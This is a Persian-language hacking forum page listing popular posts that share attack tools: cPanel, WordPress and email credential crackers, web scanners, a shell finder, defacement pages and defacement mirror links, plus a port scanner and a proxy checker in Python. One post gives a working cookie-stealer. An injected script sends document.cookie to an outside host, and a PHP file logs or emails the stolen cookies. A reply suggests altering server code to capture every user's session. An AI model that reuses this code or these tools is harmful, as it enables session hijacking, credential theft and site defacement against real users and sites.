رفتن به مطلب
انجمن تیم امنیتی گارد ایران

پرچمداران

  1. MR.wIzArD

    MR.wIzArD

    کاربر فعال


    • امتیاز

      23

    • تعداد ارسال ها

      70


  2. 0r0b4s

    0r0b4s

    مدير بخش


    • امتیاز

      12

    • تعداد ارسال ها

      346


  3. Reza.Black

    Reza.Black

    کاربر تازه وارد


    • امتیاز

      9

    • تعداد ارسال ها

      25


  4. OOOHHHAAACCCKKKOOO

    OOOHHHAAACCCKKKOOO

    کاربر تازه وارد


    • امتیاز

      4

    • تعداد ارسال ها

      107



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در دوشنبه, 22 بهمن 1397 در همه بخش ها

  1. 4 امتیاز
    به نام خدا با سلام دسترسی به دیتابیس صرف نظر از نوع اون همیشه مهم بوده و هست. یک ویدیوی تستی هم در این رابطه تهیه کردم. پسورد فایل guardiran.org Database.rar
  2. 4 امتیاز
    0r0b4s

    سوال نت کت

    nc -h و متاسفانه بله قسمت Program to execute after connection occurs نیست :((
  3. 3 امتیاز
    Reza.Black

    ابزار Zap

    ابزار Zap یک ابزار متن باز هست. که میشه ازش به عنوان پروکسی رهگیری استفاده کرد. البته خیلی کارها میشه باهاش انجام داد. مثل اسکن فعال و یا بروت فورس و...... این ابزار توسط owasp پشتیبانی میشه. پسورد فایل guardiran.org Zap.rar
  4. 3 امتیاز
    با سلام دوست عزیز بنده این تاپیک رو از اول خوندم تا اخر برای جواب به سوال شما دیگه نطری ندارم و از اونجاییم که شما مسئول یه سرور در شرکتی هستید( فک کنم) کلا دیگه نظر خاصی ندارم در سایه حق تعالی نکته : دوستان من زیاد کلمه درسایه حق رو بکار میبرم اما وقتی یک کلمه دیگه بهش اضافه میکنم بدان معنی است که دیگه هیچ نظری ندارم
  5. 3 امتیاز
    به نام خدا اسکریپت Cpanel Cracker که یکی از بهترین اسکریپت های گیت هاب هست ! Download Link github cpanelbf-master.zip
  6. 3 امتیاز
    به نام خدا اسکریپت webkiller که یکی از بهترین اسکریپت ها در زمینه اسکن و تست و نفوذ وب سایت ها کاربرد داره بهتون معرفی میکنم هم در فضای اپلود سایت براتون اپلود میکنم و هم اینکه لینک دانلود مستقیم از گیت هاب براتون به اشتراک میزارم ! Download Link پیش نمایش : ==================================================================== ** WebSite : UltraSec.org ** ** Channel : @UltraSecurity ** ** Developers : Ashkan Moghaddas , Milad Ranjbar ** ** Team Members : Abolfaz Hajizadeh , MrQadir ** ** ** ==================================================================== 1 - Reverse IP With HackTarget 2 - Reverse IP With YouGetSignal 3 - Geo IP Lookup 4 - Whois 5 - Bypass CloudFlare 6 - DNS Lookup 7 - Find Shared DNS 8 - Show HTTP Header 9 - Port Scan 10 - CMS Scan 11 - Page Admin Finder 12 - Robots.txt 13 - Traceroute 14 - Honeypot Detector 15 - Ping 16 - All 17 - Exit Enter : webkiller-master.zip
  7. 3 امتیاز
    به نام خدا Anon-Exploiter/SiteBroker یکی از بهترین اسکریپت ها که خب میشه گفت همه کاره هست منبع کد هم گیت هاب یه اسکرین شات میزارم جهت پیش نمایش تا ببینید ! SiteBroker-master.zip
  8. 2 امتیاز
    Reza.Black

    hashx

    از ابزار hashx میشه برای چک کردن طول و نوع الگوریتم های هشینگ استفاده کرد. پسورد فایل guardiran.org hashx.rar
  9. 2 امتیاز
    به نام خدا اسکریپت shell-finder که از گیت هاب گرفتم واقعا جالبه چندتا تست کردم پیدا کرد باز هم اگر مشکلی داشت در خدمتم shell-finder.py
  10. 2 امتیاز
    با سلام خدمت شما دوست عزیز وقتی شما یوزر پس رو داری دیگه نیازی بع اتیلر کوکی نیس اما با این حال بنده با دانش اندکی که دارم یکم توضیح بدم در رابطه با کوکی استیلر اینو شما میتونی رو هر کاربری که پیج شمارو وا کنه اجرا کنی نکته :این اموزش فقط جنبه علمی اموزشی داره و نحوه استفاده از اون بر میگرده شخصیت فرد وبنده مسولیتی در قبال دزدیدن کوکی دیگران ندارم شما فقط نیازمند 3تا فایل هستید اولی پیج htmlکه به کاربر نشون میده دومی کد phpکه براتون کار دزدیدن کوکی رو برعهده داره و سومی که یک فایله که کار نگه داشتن کوکی های دزدی رو بر عهده داره قدم اول: ساخت صفحه دلخواهتون <html> <body> </body> </html> قدم دوم: تزریق کدتون که جایی اپلود کردین تا کوکی بهش ارسال بشه <script>location.href="http://192.168.1.10/steal/0utc4s7.php?cookie="%2bdocument.cookie</script> قدم سوم : ساخت کد پی اچ پی 0utc4s7-stealer.php <?php $cookie = $_GET['cookie']; $f = fopen("0utc4s7file.txt" , "a"); fwrite($f , $cookie); fclose($f); ?> وساختن فایلی به اسم.0utc4s7.txt وکار تمام است. *********************************************************** یا در حالت خیلی ساده و ساده تر شما فقط اگر خواستین میتونید به دوتای اینها نیاز داشته باشید یکی کد پی اچ پی و دیگری فایل نوت پد در سایه حق دوستان چون جاش اینجا نیس نمیتونم بیشتر از این توضیح بدم بنابه دلایل و قوانین انجمن که نمیتونیم قوانین کارگزاری رو زیر پا بزاریم با سپاس
  11. 2 امتیاز
    به نام خدا اسکریپت mailcat : یکی از بهترین اسکریپت هایی که برای کرک ایمیل در گیت هاب هم موجود هست تنها برتریش نسبت به بقیه اسکریپت ها قابلت سوییچ های متنوع و جالبیه که داره : سوییچ : -t , -v برای دانلود کلیک کنید دستور ها و آپشن ها : mailcat.py gmail.com combolist.txt 10 -o log.txt -v options >> -o/-outlog <file> : Output Logfile -v/-verbose : Verbose Mode
  12. 1 امتیاز
    In The Name Of God با سلام خدمت دوستان و مدیران عزیز : اسکریپتی که قرار میدم اسکریپت پورت اسکنر هست و فوق العاده ساده و کاربردی و کم حجم به زبان پایتون هست ! تمام پورت های باز یک سایت فقط با وارد کردن ادرس سایت به شما نشون میده ! (البته اینم اضافه کنم نمونه کامل این اسکریپت میشه ابزار قوی انمپ که خب گفتم این هم بزارم برای تازه وارد ها بد نیست) #!/usr/bin/env python import socket import subprocess import sys from datetime import datetime # Clear the screen subprocess.call('clear', shell=True) # Ask for input remoteServer = raw_input("Enter a remote host to scan: ") remoteServerIP = socket.gethostbyname(remoteServer) # Print a nice banner with information on which host we are about to scan print "-" * 60 print "Please wait, scanning remote host", remoteServerIP print "-" * 60 # Check what time the scan started t1 = datetime.now() # Using the range function to specify ports (here it will scans all ports between 1 and 1024) # We also put in some error handling for catching errors try: for port in range(1,1025): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) result = sock.connect_ex((remoteServerIP, port)) if result == 0: print "Port {}: Open".format(port) sock.close() except KeyboardInterrupt: print "You pressed Ctrl+C" sys.exit() except socket.gaierror: print 'Hostname could not be resolved. Exiting' sys.exit() except socket.error: print "Couldn't connect to server" sys.exit() # Checking the time again t2 = datetime.now() # Calculates the difference of time, to see how long it took to run the script total = t2 - t1 # Printing the information to screen print 'Scanning Completed in: ', total اگر استقبال شد اسکریپت های اسکن پشرفته تری میزارم و اگر جایی از کد نیاز به توضیح داشت درخدمتم !
  13. 1 امتیاز
    سلام ی تاپیک برای اسکریپت های بدرد بخور نوشته شده ب پایتون ... واسکریپت هایی ک خودتون نوشتین امیدوارم تاپیک خوبی بشه اسپم ممنوع
  14. 1 امتیاز
    ممنونم. فقط اگه صفحه ای که کاربر توش هست بجای html و همون کد قدم دوم فقط با php نوشته شده باشه و کدش هم این باشه، کوکیش در اون صفحه به ایمیل 123@gmail.com ارسال میشه؟ <?php $cookie = $_GET['cookie']; mail( '123@gmail.com', 'Hello!', "$cookie." );
  15. 1 امتیاز
    http://www.aljyyosh.org/mirror.php?id=221685 http://www.aljyyosh.org/mirror.php?id=221686
  16. 1 امتیاز
    با سلام دوست عزیز شما برید در باره برنامه nautilus-actions یکم بخونید بقیه کارهاتون حل میشه درسایه حق
  17. 1 امتیاز
    با لينوكس كار كردم استاد ري استارتم كردم حالت اخرم جواب نميده امتحان كردم
  18. 1 امتیاز
    به نام خدا یکی از تک دیفیس های دیگه که در گیت هاب هم موجود هست index.html
  19. 1 امتیاز
    به نام خدا مجموعه کالکشن دیفیس هایی که از گیت هاب گرفتم index.html index2.html index3.html index4.html index5.html index6.html index7.html
  20. 1 امتیاز
    با سلام دوست عزیز بنده میتونم هر کمکی که بخواهید در رابطه با لینوکس بگم براتون اما یک نصیحت براتون دارم و اون هم این هس که شما وتمامی دوستانی که میخوان لینوکس رو یاد بگیرن نباید مستقیم به لینوکس کوچ کنند چون بنابه دلایلی به دردسر میوفتن و براشون یکم اعذاب اور خواهد شد کار باهاش در رابطه با افزودن کپی شماباید با ناتیلوس اکشن کار کرده باشید اشنایی داشته باشید تا بتونم بگم چطور اینو اضافه کنید و یکم براتون سخت خواهد شد اما مطمعن هستم بعد از یکبار ریستارت درست میشه اگر نشد اونو بحالت کامندی بالا بیارید منظورم سیستم عامل هست بعد از اینکه رو حالت کامندی بالا اومد دستور startx رو وارد کنید و اینتر رو بزنید حتما درست میشه و حتما یک بار دیگه اپدیت کنید تا کاملا خوب استیبل شه رو سیستمتون یحتمل یکی دوتا فایل از جا افتادن و ناقص هستن در سایه حق
  21. 1 امتیاز
    با سلام دوست عزیز کلید های ترگیبی ALT+CTRL+ARROW منظور همان همزمان بزنی جهت تصویر تغیر میکنه در سایه حق
  22. 1 امتیاز
    شاید منظور من رو اشتباه متوجه شدین. لاگینی در کار نیست. فرض کنید که مثلا من به لینک http://google.com دسترسی کامل دارم.(که این لینک نیاز به لاگین نداره.) حالا میخوام یک کاری کنم که هر کی به این لینک وارد شد، من کوکیش رو ببینم. منظورم من هم از کوکی این کوکی هست 👇
  23. 1 امتیاز
    این واقعا عجیب ترین هدفی بوده که تو بحث هکینگ دیدم ولی شما میتونید وارد قسمت کدنویسی صفحه لاگین بشید صفحه ای رو که بعد از احراز هویت شدن ریدایرکت میشه رو پیدا کنید و وارد کدهای سمت سرور اون صفحه بشید و یک تیکه کد ساده بهش اضافه کنید که کوکی تمام کاربرا یا با یک شرط که اون یوزرنیم رومشخص میکنه رو بگیرید و کوکیش رو بردارید و تا زمانی که دکمه خروج رو نمیزنه و سشن منقضی نشه میتونید ازش استفاده کنید.
  24. 1 امتیاز
    خب راستش هدف من دسترسی به سایت نیست هدف من سرقت کوکی اون شخصه. (کوکیش در اون سایتی که من بهش دسترسی کامل دارم.)
  25. 1 امتیاز
    سلام متوجه دلیل اینکار شما نمیشم وقتی دسترسی کامل دارید و میتونید با یوزرنیم پسورد قربانی لاگین بشید دیگه گرفتن کوکی اون شخص چه سودی برای شما داره ؟
  26. 1 امتیاز
    خب اگه من به صورت کامل به سایت دسترسی داشته باشم، میتونم کوکی تارگت رو به سرقت ببرم؟
  27. 1 امتیاز
    به نام خدا اسکریپت Hash Buste که یکی از بهترین اسکریپت هایی هست که تا به حال استفاده کردم که حتی نوع هش هم به شما میگه : برای دانلود کلیک کنید دستور و آپشن استفاده : Usage: buster -s <hash>
  28. 1 امتیاز
    به نام خدا سلام دوستان و مدیران عزیز اسکریپتی که معرفی میکنم یکی از بهترین اسکریپت ها برای گرفتن پراکسی های آنلاین در شبکه هست که فوق العاده این اسکریپت کاربرد داره و این که به شما میگه کدام پراکسی در سطح لول بالاتر و مدت زمان انلاینی بیشتری داره ! لینک اسکن = Scan Link fetch-some-proxies.zip
  29. 1 امتیاز
    In The Name Of God سلام خدمت دوستان عزیز امروز با آموزش پیدا کردن موقعیت مکانی تارگت از طریق عکس آپلود شده در خدمت شما هستم ! در این آموزش ما با ابزار exiftool آشنا خواهیم شد ! دستور نصب این ابزار در سیستم عامل لینوکس یا کالی لینوکس! apt-get install exiftool آموزش استفاده از ابزار : بعد از نصب کافیه در ترمینال تایپ کنید : exiftool عکس مورد نظر
  30. 1 امتیاز
    In The Name Of God اسکریپت کرک پنل وردپرس که خیلی سریعتر از بقیه اسکریپت ها عمل میکنه ! لینک اسکن = Scan Link wp.py
  31. 1 امتیاز
    In The Name Of God اسکریپت پروکسی چکر به زبان پایتون و یکی از ساده ترین اسکریپت های موجود هست باز هم اگر جایی نیاز به توضیح داشت بپرسید در خدمتم دوستان ! import requests import bs4 import time from threading import Thread from Queue import Queue import sys def proxy_check(proxy): try: proxy = proxy.rstrip() proxy_judge = "http://www.proxyjudge.info/" # any proxy judge can go here proxyy={"http": "http://"+proxy} r = requests.get(proxy_judge,proxies= proxyy,timeout=10) soup = bs4.BeautifulSoup(r.content,"html.parser") data = soup.find_all("body") for item in data: #Low anonymity if "HTTP_X_FORWARDED_FOR" in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text : if("L" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Low Alive" time.sleep(5.5) #Medium anonymity elif "HTTP_X_FORWARDED_FOR = unknown" in item.text: if("M" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " Medium Alive" time.sleep(5.5) # High anonymity elif "HTTP_X_FORWARDED_FOR" not in item.text and "HTTP_X_FORWARDED_FOR = unknown" not in item.text and "REMOTE_ADDR" in item.text : if("H" in sys.argv[3]): poxy_save_file = open(sys.argv[2], 'a') poxy_save_file.write(str(proxy)+'\n') # save proxy to file poxy_save_file.close() print str(proxy) + " High Alive" time.sleep(5.5) else: time.sleep(5.5) except requests.exceptions.Timeout: time.sleep(.5) #print str(proxy) + " Dead" except: time.sleep(.5) #print str(proxy) + " Dead" time.sleep(.5) def get_proxy(i,q): #print "Starting thread [" + str(i)+"]\n" time.sleep(5) while True: proxy = q.get() # get proxy proxy_check(proxy) q.task_done() if(len(sys.argv) < 4): print("\n\nUsage: programe.py proxy_list.txt output_proxies.txt LMH \n\nType\n L = Low\n M = Med\n H = High\n") else: num_threads = 300 q_queue = Queue() for i in range(num_threads): # number of threads to spin up worker = Thread(target=get_proxy, args=(i,q_queue,)) worker.setDaemon(True) worker.start() with open(sys.argv[1]) as fp: for line in fp: q_queue.put(line) # put list in queue q_queue.join() # wehen queue is empty exit print 'Finished' این هم کل دستورات این اسکریپت و آپشن ها و نحوه فراخوانیش :‌ Usage: programe.py proxy_list.txt output_proxies.txt LMH Type L = Low M = Med H = High
  32. 1 امتیاز
    In The Name Of God ممنون دوستان عزیز خب اینبار یکم تخصصی ترش میکنیم اسکریپت و از گیت هاب میخوام بهتون یه اسکریپت جالب معرفی کنم به نام نت اسکن که همراه با لینک دانلود لینک اسکنش هم قرار میدم لطفا قبل از استفاده فایل درباره من حتما مطالعه کنید ! لینک اسکن : Scan Link Nscan-master.zip
  33. 1 امتیاز
    سلام بدون داشتن اسیب پذیری در سایت مورد نظر (از جمله اسیب پذیری xss ) شما عملا نمیتونید کوکی های تارگت رو به سرقت ببرید چونکه کدها برای اینکار باید به نحوی به سایت تزریق بشه گرچه شاید باشند کسانی که اسکریپت یا روشهای کشف کرده باشند که بنده از اونها بی اطلاع هستم. ولی بصورت کلی سایتهای که امنیت قابل قبولی دارند در صورت دریافت اسکریپت برای دریافت کوکی اون اسکریپت و کدهای درون اون رو اسکیپ میکنن. پیشنهاد بنده به شما اینکه سایت مورد نظر رو بدقت بررسی کنید و تمام تستهای امنیتی که به اون مسلط هستید رو روی سایت انجام بدید شاید بتونید باگ و راهی برای نفوذ پیدا کنید اگر چه باز راهی برای نفوذ پیدا نکردید میتونید از سایت های روی سرور کمک بگیرید و اونا رو هم بررسی کنید.
  34. 1 امتیاز
    پروژه PyCk یک کالکسیون از ابزارهای بدرد بخور پایتون در زمینه هکینگ رو در خودش داره البته شاید زیاد ابزارها حرفه ای نباشن چون جنبه آموزشی هم دارن و برای کسایی که میخوان تست نفوذ با پایتون رو یادبگیرن به شدت توصیه میشه... پیشنهاد میکنم یه نگاهی بهش بندازین https://github.com/Naategh/PyCk
  35. 1 امتیاز
    به نام خدا اسکریپت اول : اسکریپت فول کرکر MD5 Md5 Cracker Full.py اسکریئت دوم : اسکریپت تبدیل پسورد به هش passtohash.py اسکریپت سوم : اسکریپت ادمین فایندر تخصصی admin.py اسکریپت چهارم : اسکریپت و کتاب خانه pip get-pip.py اگر مفید واقع شدند باز هم میزارم ! به امید دیدار !
  36. 1 امتیاز
    ی ماشین حساب ک خودم نوشتم ... دارای 4 عمل اصلی + لوگاریتم + توان + جذر + مساحت دایره بزودی کامل تر میشه mashinhesab.rar
  37. 1 امتیاز
    ادمین فایندر پایتون 2 عالیه admin finder.rar
×
×
  • جدید...